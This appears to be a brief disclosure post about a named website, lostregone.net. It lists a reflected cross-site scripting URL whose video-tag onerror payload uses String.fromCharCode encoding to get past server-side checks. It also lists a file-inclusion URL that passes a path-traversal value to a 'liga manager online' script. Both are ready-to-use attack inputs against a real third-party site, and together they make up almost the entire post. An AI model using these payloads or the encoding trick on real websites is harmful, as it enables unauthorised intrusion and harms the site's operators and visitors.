Skip to main content

lostregone.net | XSS, file inclusion

Even if with some server side checks the XSS passed.

http://www.lostregone.net/index.php?words=<video src=1 onerror=alert(String.fromCharCode(112,97,115,115,101,100))>&where=1&go=Vai!&rate=5&id=5062&cal_month=Apr&cal_year=2010&submitted=true&address=Indirizzo+E-mail&action=add

Remote File Inclusion (the script is liga manager online)
http://www.lostregone.net/GSC/gsc.php?action=table&tabtype=0&file=..

Comments